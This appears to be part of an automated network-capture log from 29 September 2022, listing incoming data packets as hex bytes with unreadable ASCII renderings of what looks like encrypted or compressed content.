                                                                                                                                                    2022-09-29 12:59:14 UTC26791INData Raw: 07 22 aa c4 e1 43 dc 83 fc 13 8a 2c 7c 85 89 3c 0d 25 ab 3d 82 72 df 58 4d 64 03 b6 5d 0c 1f 9f 11 23 4e 99 72 89 19 2e 5a c9 da 02 af 5c d8 e4 ad 69 73 1b ed 0c 8a 04 7a 3b a0 50 82 1d 13 ee 07 51 18 f6 ac 5e cf 05 3e ca 02 3d d3 e3 f3 dd 30 e5 27 fd fc 24 7f aa c2 93 cd b9 02 c8 f1 90 fb 20 ea 03 d6 12 a3 6d 52 bd 0a 7c 0a 08 84 4d 65 2d e1 f9 ae f9 ee 7a be 19 fa 56 ba 30 cd 13 35 2e a0 6e 8f ee d6 5b 31 05 d8 0c 5c ea d2 4f 13 75 26 f2 3d 99 d1 ad 51 60 f8 8e e2 cb 54 9f 56 82 b3 6a 6a ab a4 be e4 97 3b d1 ca 0d e5 d4 1b 96 3e f5 00 7b d0 c6 53 75 29 92 ba b2 46 80 29 d1 fd d8 38 8f 2c 9f f1 11 0a cb 60 c9 e8 ba bb f0 31 44 a8 4f 01 aa 78 82 f0 eb 97 0d 25 01 77 10 ff 1f 92 e4 07 7b 1c 33 81 91 9d 27 14 a8 0b 37 ce 49 3b 7d 14 3e a9 71 13 a4 ca 99 6b
                                                                                                                                                    Data Ascii: "C,|<%=rXMd]#Nr.Z\isz;PQ^>=0'$ mR|Me-zV05.n[1\Ou&=Q`TVjj;>{Su)F)8,`1DOx%w{3'7I;}>qk
                                                                                                                                                    2022-09-29 12:59:14 UTC26807INData Raw: 91 c8 e9 a2 18 e7 be 69 1a d1 f9 cf 3c aa 48 61 80 79 ee 14 8c 83 f6 41 c5 15 ab 95 ea 98 0f 59 61 fa 22 43 60 5a d2 73 ae db 68 d0 8b ff c9 77 05 95 15 7b 9c 0f bc 55 83 77 8b 27 6f 72 23 8d 6c e0 b7 b8 e1 dd af 5c 7b a6 15 54 09 8a 97 33 4a 42 d2 4d 9f 7e 95 e3 92 ce 29 8d 5d 23 f6 85 a4 15 85 60 b3 75 21 fe f1 fd f0 81 00 72 e5 44 68 7a 87 0c 40 70 30 76 76 29 91 00 19 d8 d5 17 cc a5 37 63 c2 80 59 0f 81 a2 6a 47 af 3a 83 af 6f 73 b5 7c 9e 81 73 2a 38 62 32 f4 d6 d6 e3 88 bd fa b0 52 4f e2 2d b6 69 62 62 2a 70 8c 62 7c c2 62 78 69 16 1f e3 42 10 7a 3c 3f 6e 25 12 12 42 7f 6b f2 07 42 ef e4 4d ab e2 99 52 14 e0 85 bb 99 1c 11 fd a9 dc 70 2f dd 91 ce 27 72 80 02 55 5b 64 cb 95 63 ce ca c0 da 18 4c 35 81 1a bd 7b f9 a6 29 dc 58 b2 7d 8a 5d e5 5b 80 06 42
                                                                                                                                                    Data Ascii: i<HayAYa"C`Zshw{Uw'or#l\{T3JBM~)]#`u!rDhz@p0vv)7cYjG:os|s*8b2RO-ibb*pb|bxiBz<?n%BkBMRp/'rU[dcL5{)X}][B
                                                                                                                                                    2022-09-29 12:59:14 UTC26823INData Raw: 6f 4a fe c2 a3 ea 5a 04 ce 9a 4f 67 07 77 a8 9a eb 86 f3 83 2b 4f 15 6f 38 0f 4f b4 a3 29 1b ab 0b b2 75 ad 76 85 11 09 c5 e6 74 88 9d 16 d4 4a 12 5f 6c 4b 30 98 c7 d8 ac 28 cb 25 8e 60 49 ef 86 a5 43 c3 fc bf 2e 14 04 98 2d 8f ae 44 24 f3 53 6e 6b 80 b4 6d aa 26 5f 96 bc 8b c9 33 11 c6 f4 7d dc cb d0 28 34 8c c5 aa a4 55 94 44 e3 fe 3c f6 c1 bb 6f 90 58 28 2f 15 55 c4 d8 3f 49 65 dc 12 e6 43 0e 5c cd 0c 64 2b 7b 14 d0 75 b5 d1 49 69 b2 1f 60 85 28 47 4f 6e 64 fe 06 7f d0 28 0f 7a 7d b3 07 33 42 a6 d1 5f 72 b9 9d 5e 47 26 cc 63 91 9d 19 8b 1c d8 a4 e3 8f 03 1b 7c 5a 55 8d a5 f3 e3 37 ef fd 53 78 65 c9 31 c5 5d a1 fb c9 b0 b7 3a 1e ad 4a bb d8 bc 6e b9 e1 c8 8f 2f a9 58 51 a5 21 6c 25 33 30 14 1a ff ff 69 df 8f 31 cb 6b 0e b4 08 26 95 5b be 42 e5 79 af b5
                                                                                                                                                    Data Ascii: oJZOgw+Oo8O)uvtJ_lK0(%`IC.-D$Snkm&_3}(4UD<oX(/U?IeC\d+{uIi`(GOnd(z}3B_r^G&c|ZU7Sxe1]:Jn/XQ!l%30i1k&[By
                                                                                                                                                    2022-09-29 12:59:14 UTC26839INData Raw: 7e 64 73 58 92 65 a0 d6 3d cb 07 22 ce 71 6f 00 b1 0b a1 d4 4f 90 6a 36 cd a9 c7 eb 90 70 46 9a 59 b7 b8 5c 32 89 b6 2c a8 d2 26 84 a8 c7 19 16 0e 96 c3 8c 0d b2 16 d0 73 14 68 9d 7a 02 47 62 65 12 1e e4 c1 04 2a 17 47 60 0a bc b9 ae 1a 2b d2 8a 31 85 d8 21 88 1d ea 50 38 90 c7 e9 59 3c 6c 5f 4c 0b 91 94 91 35 9e e2 9d b4 ca 33 29 7b 6a b1 85 84 de 24 2e 42 83 4a 77 f3 38 2a c0 54 40 a0 70 9d c8 bd d1 90 86 f2 47 f4 e1 bb 72 00 d8 e0 94 11 f6 5c fe 40 06 8a 8f 91 19 3c 31 39 14 39 3e bb 6b 51 b0 c8 3b c1 4b fa 67 14 af 70 2e 44 90 97 27 c6 32 70 ea 0e e4 b9 d5 7b f1 ca 5b 12 03 bb 84 c3 6e 59 d5 fa 70 5a 05 cb 3f a8 b6 7c 2d ab 1e 26 b1 bb c0 25 20 34 e5 92 ab c5 67 56 24 43 25 09 07 b0 50 ae 8d ee 11 b3 13 38 a7 1a a8 f5 9c b7 95 e6 a4 0a 35 15 43 42 94
                                                                                                                                                    Data Ascii: ~dsXe="qoOj6pFY\2,&shzGbe*G`+1!P8Y<l_L53){j$.BJw8*T@pGr\@<199>kQ;Kgp.D'2p{[nYpZ?|-&% 4gV$C%P85CB
                                                                                                                                                    2022-09-29 12:59:14 UTC26855INData Raw: 53 a4 33 33 9c cd d8 80 57 a6 91 8c f7 51 f2 e6 ef d9 9f 8c 8e 05 c8 42 3c 60 32 fb 53 a5 75 4e a5 a9 fc a8 37 64 9a 9f 78 8f 2c f3 6d 8f c3 0c 57 1e cb 82 a9 f7 88 45 2f 9f bc 72 c6 7d 65 f6 df ba 62 2a 46 05 27 54 68 a0 3a 33 59 04 66 31 80 38 7f 07 88 5a c8 21 d6 1d 6c a1 46 53 1c a6 bd 9a 09 d6 77 75 de e1 cc cb 36 73 a2 01 5d f4 94 37 d0 30 e2 45 06 4b e4 10 a2 0c a2 3b 07 fa 24 18 57 fb 2d d4 7d cc 16 5c 9f 67 c2 cf ce de 10 45 22 1d 18 41 18 c4 8d ab 71 3e 05 e2 86 33 aa 4f 92 13 f3 cd d9 ef 99 de 77 14 fd 57 31 9f 81 ff 3d 36 aa 6d f9 45 3e be ab fc d9 8b 0a 98 c9 6d e3 f2 17 22 97 d0 47 73 26 70 d2 b0 4b d1 f9 27 bf b4 b7 45 f6 19 96 2c fc 51 92 df ca f4 ab d6 be fe 32 31 98 63 de 30 64 b1 8e c8 ff 85 e7 ba d8 01 70 fa 20 5b d3 98 53 7e 51 50 21
                                                                                                                                                    Data Ascii: S33WQB<`2SuN7dx,mWE/r}eb*F'Th:3Yf18Z!lFSwu6s]70EK;$W-}\gE"Aq>3OwW1=6mE>m"Gs&pK'E,Q21c0dp [S~QP!
                                                                                                                                                    2022-09-29 12:59:14 UTC26871INData Raw: eb f5 27 81 a8 89 d4 0c 5b f3 c0 e9 56 fc 81 46 05 9d 0b 17 ef 6e 53 a3 c8 02 68 e6 81 ed b9 69 11 f5 f8 46 09 be c1 cb 12 62 f9 ee 80 9e 1d d4 4f df 75 1d 68 5c 3c 5c 53 6e 4e d0 f6 ef 86 24 f2 6e fa 0b 45 76 55 8d 29 16 13 f1 4f f8 4c ac d9 90 c5 b8 e7 57 dd a0 ba c4 80 57 4d 37 89 d6 1c 9e 4d ee 93 ad a2 2c ff c6 5a e5 97 aa b1 ad 53 6a 1a 63 ef 42 2d d6 86 df aa 81 b0 0a 3c 20 dc 41 cc 07 ca 8b ef 84 7b 97 f8 02 b7 c3 d1 1f 50 23 93 6a c9 c7 38 4e c4 56 4d 80 52 99 18 b4 a8 64 ac 15 64 b8 41 cc 6f b1 91 46 6d 1e 01 5e 12 62 27 50 e0 2e eb 67 e8 ae 94 ff 65 3b f5 23 7b f0 6d d1 4e 1f 2f 94 0d 5d 2a 43 ef 0b 68 3b 20 59 a5 58 d7 a0 5f ae d8 39 bb 5a b9 0b 23 d8 09 9e 33 c1 2b a8 ab 0f 8e af a9 62 cb 48 23 e9 49 12 bb 80 d9 c3 c1 67 80 c5 c8 be 07 99 dd
                                                                                                                                                    Data Ascii: '[VFnShiFbOuh\<\SnN$nEvU)OLWWM7M,ZSjcB-< A{P#j8NVMRddAoFm^b'P.ge;#{mN/]*Ch; YX_9Z#3+bH#Ig
                                                                                                                                                    2022-09-29 12:59:14 UTC26887INData Raw: 61 eb f6 87 57 d8 44 f7 4c a3 52 0c dd 2c bb ab 48 71 47 6c da 76 f6 34 5c 47 5a 97 5b 23 b8 be 66 24 b2 a7 13 ac dc b0 3f 1b 9f 90 51 cf 60 29 f1 79 51 69 63 e7 d2 f1 e2 27 67 2d e5 17 14 b0 d1 8e 10 11 a9 0c b6 5d 27 c4 2b a4 58 d9 a7 50 ed c0 db 20 74 11 dc 29 39 df b2 4d f4 45 29 c0 e0 17 8b bf 62 80 a5 1d 92 32 2c 43 3e 1c b4 56 bb 41 db bc 49 ad 3d a2 f4 d8 4d 46 f1 bc 57 d4 76 8b f3 8a 3d 8e 66 09 a6 5c e1 86 1f cb 49 d3 98 ef 73 66 ec f1 74 d8 f6 67 83 8f 43 a8 de 4e 59 91 e9 8b f6 0c fe 5e b2 44 4d 94 47 44 d5 10 90 38 04 4a 74 36 39 b1 f1 69 e4 7e 3c c9 1d fa 8a 7b 31 0e 2d 6e 29 62 45 6a 2c 36 e3 f6 6f 92 51 40 17 69 47 9e 97 70 88 7a 18 3a 21 06 6f b8 43 58 9a 8e 20 f7 f9 22 09 34 33 71 fa 84 61 78 37 37 48 14 c3 72 55 81 ad 05 01 8a ed 04 67
                                                                                                                                                    Data Ascii: aWDLR,HqGlv4\GZ[#f$?Q`)yQic'g-]'+XP t)9ME)b2,C>VAI=MFWv=f\IsftgCNY^DMGD8Jt69i~<{1-n)bEj,6oQ@iGpz:!oCX "43qax77HrUg
                                                                                                                                                    2022-09-29 12:59:14 UTC26903INData Raw: 04 ea 57 a2 39 b4 cc 0d 8b a7 ba b4 66 03 01 6d 90 1e ff 46 48 6a 84 e6 82 f9 14 35 3f 54 e0 92 7f 76 00 9c 0b 9a 09 a9 2f e5 dd 63 ce 40 0a e0 b6 e5 cb 23 b3 a3 eb 01 3b 51 15 d4 6b 16 50 e9 82 4e a8 e1 bf c0 d2 5a db 46 f3 ca fe a7 57 4c d7 7e 9b 39 4b 8f 2c 74 93 8b 4a b0 91 60 6e 4d 85 f9 1e 12 68 01 6d 90 0c 4b cb 0d c2 43 df 72 14 46 28 af 0d 4d 5b a8 96 f5 56 34 58 e9 f4 58 ba 08 c0 1b b0 91 74 84 dd 30 4e 85 1d 9c 34 4a 73 2f 43 d8 87 b4 18 a7 95 f2 62 ea f6 ec a9 a8 be dc d6 c5 89 a6 48 3c 88 a9 5c fa 3f fc af ea eb 4d bb ea 14 51 0c 3c 49 5a 8a 5e e0 c0 78 d2 db 11 aa e5 c8 dc f5 5f 06 89 f3 85 23 43 56 96 32 ac e6 42 76 08 38 1a 9d d0 79 27 b6 e8 04 55 4d 0e 4a d0 c6 cc bf 52 67 b3 f5 34 42 50 72 b5 85 18 6a 6c cf a4 ba 89 82 50 9f e9 05 31 ef
                                                                                                                                                    Data Ascii: W9fmFHj5?Tv/c@#;QkPNZFWL~9K,tJ`nMhmKCrF(M[V4XXt0N4Js/CbH<\?MQ<IZ^x_#CV2Bv8y'UMJRg4BPrjlP1
                                                                                                                                                    2022-09-29 12:59:14 UTC26919INData Raw: f5 cf 62 b0 41 c9 ce 46 05 32 ba ef 30 9c 2c 41 e3 79 51 13 d5 29 49 ca 5b 3b f0 3a 06 8a 4c 6b 45 6d 13 b6 0c cf 11 b1 0f 80 7e 5c 90 51 cc 83 be 61 f8 4e c8 75 2c d1 2e a5 2b 79 c6 a0 4e 8a f0 93 eb 29 5e 59 85 cf 03 92 9e db 88 b1 28 cd 8a 5b 55 de 4b 65 fc ee 7d c5 bd 60 4c d1 74 14 2a 3f 15 57 36 6d 3a 88 16 90 9d 4f 8b 6d 33 19 c8 60 51 40 a1 63 02 2b 11 d8 76 23 21 a5 10 51 d2 86 ae 49 30 a5 a6 43 05 b1 2a a3 58 90 98 b1 b4 fc 4e f9 6f d2 0a 16 26 da 6a 21 12 f8 d6 10 83 df 4e 9d 1a af 63 fb 7d 03 26 8c 74 3b d1 ad a8 99 f0 49 5c b9 a9 2e d6 ef da 5b 0f a5 50 4c 75 67 da 18 61 b6 d0 81 8e a0 5e f5 f4 e6 7a 94 57 bb 41 34 bf f4 a9 43 52 b8 06 48 e6 44 1b dc d9 ef 54 05 9e f6 24 a4 3d 1e 6f 09 e9 3b 1e 5f 1b c0 48 86 59 53 00 72 c0 82 c5 ad 15 4f 1d
                                                                                                                                                    Data Ascii: bAF20,AyQ)I[;:LkEm~\QaNu,.+yN)^Y([UKe}`Lt*?W6m:Om3`Q@c+v#!QI0C*XNo&j!Nc}&t;I\.[PLuga^zWA4CRHDT$=o;_HYSrO
                                                                                                                                                    2022-09-29 12:59:14 UTC26935INData Raw: b1 b8 cd 94 3f 40 c2 26 54 8c b6 41 ff 9b b0 a7 95 46 9c 82 fd b3 e1 0c 77 f3 f1 8b 9f 0c 8b 64 37 5e 2e 35 60 27 58 95 1e ca 14 45 0e 99 87 e7 65 2d 14 33 fa 82 fe 69 a2 fc ba da 9a b4 1d d5 92 35 73 af 93 66 b2 24 16 25 21 cd 7c eb ba 97 75 97 e8 7e 4a fa 32 5c eb bf 02 3f df 81 5a 36 a5 1c c7 6c 89 7e 0d 13 04 38 47 e2 6f a7 fb ce f2 fc ef 24 65 91 64 3d 42 1f 2c fb 2a e0 a7 5f 30 8a 8e d2 ea f5 70 1f b4 2d 8c 0a f7 dd 78 f6 7d 16 95 bc 88 bb 57 32 c1 d7 eb 49 e4 4c 2f 2d 78 d0 60 c9 da be ee 3c ef 96 15 62 c5 61 9c 05 e3 a8 9e 4d 85 37 ea 75 94 3c 34 c6 cd 2c 63 41 0e ac 46 17 4a 82 82 21 79 82 32 91 44 8e 42 4a b4 f2 97 f2 57 f9 56 19 de f6 38 0d 1a 66 a7 d0 d3 d1 c8 0f 00 36 63 a1 af e2 a2 4d 4b 7a dd 2e cd 55 1f b4 44 4e ad 48 60 6b c0 eb 4e 1b 60
                                                                                                                                                    Data Ascii: ?@&TAFwd7^.5`'XEe-3i5sf$%!|u~J2\?Z6l~8Go$ed=B,*_0p-x}W2IL/-x`<baM7u<4,cAFJ!y2DBJWV8f6cMKz.UDNH`kN`
                                                                                                                                                    2022-09-29 12:59:14 UTC26951INData Raw: c2 fc 99 ae 05 e9 1e 60 82 e8 74 e4 95 f2 53 fc f0 83 f5 84 b9 2d 47 0a 86 39 66 35 30 ad 27 5b f8 4b b4 54 60 93 d9 aa e1 4b ff 8b 44 81 8f 7b de 03 74 4e 62 cd c0 e3 24 39 d3 1a 7c 9b 88 db 38 2b 47 b7 37 41 b0 33 3c ff e5 07 7d 27 fd 4f cf 46 54 41 0d e5 a3 8f 81 68 4f df 4f b2 e3 15 16 c1 e0 f0 62 3e 8a 64 33 2b f4 87 7c bf 15 97 c2 39 30 7f ab 03 ee 86 b5 c4 88 f2 86 26 33 bc 46 e8 bc 96 40 bb 66 fb a8 a7 de c5 a4 8b 67 79 be c6 7f c9 cf 57 b0 ae 3b 6e 43 a3 b4 07 4a 21 0f a6 a2 9e 79 cc 19 24 df 2c 09 1c 89 2e 01 b4 02 e4 4c 46 7f e7 8c 44 66 51 0e 79 27 9d ca c4 f2 0f c8 55 88 2b 9e b7 18 10 3a 30 c4 2d 5d 0f 40 f8 bc a9 9e e7 0b d1 b7 15 98 ca 04 0c db b7 31 dc 14 75 e9 ad 26 46 bf 23 89 18 0d 94 68 7c ee de 80 7d 7a 79 09 ae 26 f1 3f 42 03 55 81
                                                                                                                                                    Data Ascii: `tS-G9f50'[KT`KD{tNb$9|8+G7A3<}'OFTAhOOb>d3+|90&3F@fgyW;nCJ!y$,.LFDfQy'U+:0-]@1u&F#h|}zy&?BU
                                                                                                                                                    2022-09-29 12:59:14 UTC26967INData Raw: 4e d0 6b 10 2a 19 7e 87 84 ab 34 52 98 3a 90 f3 59 b1 74 22 fa 17 18 2d fb 24 32 39 e3 6f f2 93 10 cb 0a 0d 65 f3 8d ed 14 05 3f 92 62 a6 3b 61 bb ec 9e a3 77 27 4d 98 bc 3d d0 c2 1e 57 2a a6 5a 70 d2 69 e9 4c 31 01 5d 15 8b c2 a1 09 3c 8d 8c 8f 5d 04 0f d2 1d fa ea e7 ae 7b bb b8 33 5f c4 a0 44 32 8b 26 04 0f e6 b9 42 01 35 37 77 71 9d f6 0c e5 58 6f b4 4b 7f 23 a7 3f 9b 5e 96 0d fa 8b 67 b4 4a 27 b0 3f 63 d3 01 de 60 c9 4c db f7 c6 19 78 2c 58 b6 62 69 43 f6 f2 00 da 2c c5 c4 eb 2d 19 98 cd b8 81 23 29 5b 6e b8 5f a2 3e 78 80 00 11 a2 4b 0c be e6 25 0b b3 6b 1d a6 fb 28 f6 74 5f 50 5b 5a ac 0d 22 25 bc 5f 3a 85 e8 a7 c6 d8 f2 ae d6 68 19 3b b1 8b fb 66 9e d1 63 20 a3 9c 3f 44 40 85 70 c3 aa 3d 61 1d 97 81 f5 43 53 83 2c b4 d2 a1 c5 9e 0a ca ba e4 c4 4e
                                                                                                                                                    Data Ascii: Nk*~4R:Yt"-$29oe?b;aw'M=W*ZpiL1]<]{3_D2&B57wqXoK#?^gJ'?c`Lx,XbiC,-#)[n_>xK%k(t_P[Z"%_:h;fc ?D@p=aCS,N
                                                                                                                                                    2022-09-29 12:59:14 UTC26983INData Raw: 6a 13 df 77 ef 2d b3 9c 61 85 4e ea 40 77 f2 c9 89 33 29 66 4a 84 6d 59 69 f8 6c 20 6c f9 7a 72 8b 5a db e5 4c 39 ac 06 90 4e 40 a6 c6 e0 dc 82 43 12 76 50 14 b5 70 d7 97 fc 25 c5 2a 79 aa 59 ad cb af 83 99 5b a1 41 4c 55 4d b1 90 f1 cf 85 2d 76 77 24 99 17 e5 6d a5 e0 a1 18 ef ef e1 10 f2 f0 fe 40 24 1c 34 fd dd ff d2 85 0f ae e5 b6 4d 9e ee 2f 3c 90 5d c1 b9 bc fa 41 14 82 e6 9c fa 08 17 18 3a 7f da 82 05 05 ae ca 4b 85 00 3b ec 48 83 8c 92 e2 ac d9 71 42 36 65 1e 4e dd a6 24 ec 85 cd 5c 39 d6 0f 27 ef e8 75 0c 59 fc d8 6e 11 96 2d bf 0c 97 6c 2c d1 13 1e 0e 90 7b 60 85 9e 0e 90 ba 12 91 f3 b5 25 43 7e 71 fd ef 4a 1b 23 c5 5f e9 4d 36 f8 97 94 3a 3b f4 4a 21 b9 cd af 96 d0 d8 9c ac 63 db 1f a6 a5 cd 59 ec 0c b9 2d ec 06 68 a8 b7 0e 40 62 cb 16 d0 42 f5
                                                                                                                                                    Data Ascii: jw-aN@w3)fJmYil lzrZL9N@CvPp%*yY[ALUM-vw$m@$4M/<]A:K;HqB6eN$\9'uYn-l,{`%C~qJ#_M6:;J!cY-h@bB
                                                                                                                                                    2022-09-29 12:59:14 UTC26999INData Raw: 59 97 24 fd 77 5c 5a 7c 27 ae 3e 9d 25 cf 1a f3 29 67 c3 8b f1 2c dd 94 8c d1 c4 81 b5 22 14 f7 61 84 69 6a 10 23 4c 37 c2 b4 7e a4 48 4d 6b e4 8c 31 a6 e0 e6 49 25 94 b9 d9 9f 7c 37 da d3 45 a9 52 a5 d6 41 f4 69 97 92 66 3b 68 a9 a3 53 d7 f5 a1 75 22 0a e9 ba 6f 36 54 af fc f5 c5 aa e5 0f 12 8a 43 c0 21 ce 76 47 0c 93 37 ea 60 61 58 40 0a 51 e8 9a d7 15 1c 26 9a f5 be 3b f1 20 8e 22 ee 7e 57 59 43 8a 66 35 b0 1b 25 6f 20 ac f9 0c 5f a1 fe 5a 9f e9 fb 20 7a 36 9a 1d e9 44 64 a0 2b 4b 66 b8 5a c5 bc 3d 38 ad 95 88 59 1c 84 e4 35 18 03 b6 f7 5d ea 55 1a e1 7f fe 06 53 de 94 ec f3 05 b2 a6 95 4f 7d 41 db 31 b2 11 b7 75 70 3a 11 6f 58 45 a1 29 4e 04 91 8e 28 b2 88 81 d7 3f c3 8f df 12 a8 72 08 bd 5e bd 9b de d5 52 4a ec 37 be 68 6a a2 5e 29 4d 02 ec b4 c5 c5
                                                                                                                                                    Data Ascii: Y$w\Z|'>%)g,"aij#L7~HMk1I%|7ERAif;hSu"o6TC!vG7`aX@Q&; "~WYCf5%o _Z z6Dd+KfZ=8Y5]USO}A1up:oXE)N(?r^RJ7hj^)M
                                                                                                                                                    2022-09-29 12:59:14 UTC27015INData Raw: 31 5e c0 f1 23 5e 5d 18 63 9f 7a 3a 9d 63 f2 5f a6 30 59 1d 03 ed 7c 2d 00 dd 00 b8 f0 97 bd 2e 5c 1c 20 1e bb c8 49 d9 f0 3a 1c 38 cc 35 c5 3f 9c 4a a2 fb 23 35 af 75 b5 b6 5a 1c 56 8e 66 0f e2 68 65 d1 c3 7d 55 2d 9d 12 12 f4 76 95 64 0c 81 81 4d af 27 3b af 54 cc f0 d1 08 7f f1 0b f7 0b 04 83 70 93 cc db 4e f5 1f 87 ec 0e 54 ee 8a 75 e0 11 0e b0 ad 13 f4 91 54 29 63 05 76 20 db b7 76 c2 f9 52 11 dc 0c 9f 01 ed 1c d0 52 1e d2 fc fb 6b a0 c1 3d 05 bb 2a d3 7f 93 c2 73 ef 2c 4f 2f cc 3b 2a 1d cd 7b 59 0a 78 39 19 31 98 44 84 73 ab 13 c7 85 6f 1e 9c 88 72 70 d4 ab b3 ce 38 ac e6 6e 80 64 ab fe a2 59 42 5e a5 aa 01 7f 76 99 d6 46 91 6b be f1 fd 9c 4e f3 97 13 2b 27 0a ec 6f 7c 54 74 0d 81 d2 90 b2 b2 a2 fb 9a 3f 04 17 ee 3f 1e 9e ec b2 7d 10 dd 28 28 01 5d
                                                                                                                                                    Data Ascii: 1^#^]cz:c_0Y|-.\ I:85?J#5uZVfhe}U-vdM';TpNTuT)cv vRRk=*s,O/;*{Yx91Dsorp8ndYB^vFkN+'o|Tt??}((]
                                                                                                                                                    2022-09-29 12:59:14 UTC27031INData Raw: 6b bc 13 9c e5 d5 a9 4b 94 e0 5f 8e 00 40 cb cb ff f4 2b bb c0 41 d0 7d 5e 7e e6 42 4d 21 cb 12 3c bf 66 a3 50 01 52 80 2c df 1d ab 88 53 35 dc 58 1f 4e c8 06 58 e1 b8 b7 32 72 9d 61 bc 33 2f 21 97 79 74 74 e4 fc 20 c8 d3 38 51 89 fc ec d5 47 34 0a 7f c5 72 0c 85 5e c1 d1 a9 0b ac dd 81 9f 45 f5 7f 94 b0 8a 5f 98 d8 69 87 19 40 af ad 5b ae 8d 8e da b9 28 2e cf c7 5b 40 f8 65 e3 d2 14 3b 27 03 b4 77 d0 a4 a4 01 af 25 f4 3a 34 b4 70 87 94 83 4e c7 47 40 c7 62 10 34 36 9c f1 44 ba 75 d4 2c e4 04 d1 40 c6 ce d0 5f 89 39 58 69 9c b7 4a 82 f3 f3 64 0b 95 a5 40 62 ed 8e 3d d3 eb a0 17 6e 8e 68 c0 d6 4a 8f 33 79 ec 98 d9 b2 a8 a7 16 8b 5c a9 2a c1 12 43 1c a7 8d 7b 02 f0 19 8a 79 81 43 73 88 b2 dd 95 c0 d3 ea 45 74 19 a5 c8 70 c2 99 c3 d5 6b be 74 8d 18 64 89 2c
                                                                                                                                                    Data Ascii: kK_@+A}^~BM!<fPR,S5XNX2ra3/!ytt 8QG4r^E_i@[(.[@e;'w%:4pNG@b46Du,@_9XiJd@b=nhJ3y\*C{yCsEtpktd,
                                                                                                                                                    2022-09-29 12:59:14 UTC27047INData Raw: 0d ca 94 c0 23 7a 6e 66 bf 60 6e a5 4d c3 16 1c 3f 5d df 3f 5c 4f 93 00 3d d8 bc 8f 06 74 4d 12 ce df 43 16 fc d6 98 84 90 61 ba 06 98 41 98 4d f9 94 da 81 d4 e5 2e 50 f6 9b 2e 9d 22 d1 07 2a d3 ae f4 77 82 49 6b ce 5f db b1 89 f8 29 ef 6c c8 2b e9 31 8b e0 84 18 c3 f2 83 e8 a8 8a 8b d2 43 51 1d 6e 78 48 00 7f a4 6d 77 80 ae 5a 34 f6 88 1c e3 14 79 7d b4 1b ce 19 88 20 8a 0c f9 d0 7e 10 3e ec 15 b9 fd ff 2c 0c a1 79 ed cb 2e 80 4a 5e ca 8e c2 cc c4 db f1 bb 53 74 26 3c e9 67 d0 48 53 16 ad 0a ec b1 ee 6d c2 26 27 1a 46 1a 1e ad a0 bc 28 84 7c 5c 00 51 f3 87 7c b3 d3 6f 7c 12 65 41 89 ac 90 b3 79 fb 45 75 83 e5 f6 b6 08 b0 20 82 b0 5d 17 2f 47 6f 8f d1 d0 39 15 f3 b9 96 f9 88 8d e5 f3 e0 47 fd 94 c1 d6 0d 80 4f b5 30 ff df 4a f5 bb 0e 89 fb 7a 7e c0 eb e3
                                                                                                                                                    Data Ascii: #znf`nM?]?\O=tMCaAM.P."*wIk_)l+1CQnxHmwZ4y} ~>,y.J^St&<gHSm&'F(|\Q|o|eAyEu ]/Go9GO0Jz~
                                                                                                                                                    2022-09-29 12:59:14 UTC27063INData Raw: e2 8c 7d a8 a6 6c e3 a2 25 c5 30 be c4 a3 01 e0 44 d8 bd 77 ad 22 ad b7 d8 82 f9 ca e5 c2 c3 45 e1 22 70 01 b6 fc 7c 74 68 6e 89 d8 af 7c 95 17 06 9d 15 7b 01 e9 69 b3 15 11 b9 12 00 3c 02 87 e8 e5 c3 35 a0 5c 67 1f fc 94 1d 97 5a e9 31 a5 52 2a 80 2e 08 eb 85 0e 14 f7 93 98 d2 77 36 c5 43 34 91 50 68 ce 1d 0f 98 b6 61 32 c9 e2 92 f0 92 82 72 82 72 2a cd 6d 3c ba 1d a1 1f 2b 48 9e ce ff ef e0 41 ab 57 cf e3 47 f0 4f 47 8c 45 9a 00 a5 ce 31 e9 56 59 ba 7c 9f ed 1a 4a 52 dd f6 ea b3 05 83 2c a6 ed ab 2b 96 e8 44 3e 1e c8 69 ec 1b 1d 19 03 53 ff f8 f2 e3 68 83 11 df 06 e7 23 60 08 33 0a b4 a1 8c ea 59 b6 34 f6 30 08 b5 72 df 52 e3 a3 22 87 ff 60 0c 2c 9c 89 10 81 39 61 fe e1 0c 87 e4 c0 75 ab 4b 93 3d 6b e2 f2 43 df 3e 40 74 c7 0e d5 dc 53 af be f8 46 e7 06
                                                                                                                                                    Data Ascii: }l%0Dw"E"p|thn|{i<5\gZ1R*.w6C4Pha2rr*m<+HAWGOGE1VY|JR,+D>iSh#`3Y40rR"`,9auK=kC>@tSF
                                                                                                                                                    2022-09-29 12:59:14 UTC27079INData Raw: c9 c8 f9 ed 53 07 d2 95 29 47 0a 90 3b fe 20 c4 7d 16 77 7f cc 31 08 7b bc c8 1a ca 45 b6 a5 22 0c 20 ff 3a 4a 7c 14 b5 d2 a2 ca b3 f2 ff 07 04 ab 33 c6 4e cf 21 6c 1e d2 f5 7b a7 5b 66 32 da 02 ff 6c 5d 4d 4e 8d d6 16 2b 39 4b d1 3b 86 65 45 6b a5 16 1a e1 9c e6 63 c9 e4 65 71 6f 24 8b c9 5e e8 02 f9 bc 0e 26 6e 77 7e 94 cd 2b 39 54 52 c9 17 9e c1 1f d0 bf 81 98 54 0f 33 06 0e 67 41 3d fa 15 c9 74 08 39 ea 8d a7 07 d5 e8 9d 47 a5 3b 0f 9b 8d dd 99 0b a8 27 e9 90 1c 03 e8 87 13 48 82 c7 3e 54 46 a7 6e 4f ad 11 e8 65 eb 70 69 d5 2d 61 4f ab a4 a2 ec db c6 96 a7 7e 86 2b ea 7b e0 53 d9 4d 98 b6 22 32 bd dc f1 5a 01 33 3c 60 ff 4a 9c ee 31 cc 5d 08 3a 1d 74 d6 18 2b e1 f7 06 34 7c 97 ed 0a 45 07 0d b7 44 b3 46 43 96 35 87 90 39 bf 4d 93 a9 ca dd f7 8c 65 6f
                                                                                                                                                    Data Ascii: S)G; }w1{E" :J|3N!l{[f2l]MN+9K;eEkceqo$^&nw~+9TRT3gA=t9G;'H>TFnOepi-aO~+{SM"2Z3<`J1]:t+4|EDFC59Meo
